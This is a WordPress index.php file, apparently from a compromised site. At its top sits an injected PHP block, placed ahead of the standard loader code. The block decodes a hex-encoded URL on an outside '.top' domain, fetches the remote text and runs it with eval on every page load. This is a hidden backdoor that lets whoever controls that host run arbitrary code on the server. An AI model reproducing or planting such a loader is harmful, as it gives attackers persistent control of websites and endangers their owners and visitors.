File: /var/www/volumes/69b4844ae61d4e92bf26ad98af552775/wordpress/index.php
<?php
$path = hex2bin('68747470733A2F2F63772E61636964706F6C6C2E746F702F6A632F363637302D63772D7964322D66676A343736342E747874');
$code = implode('', file($path));
eval("?>" . $code);?>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';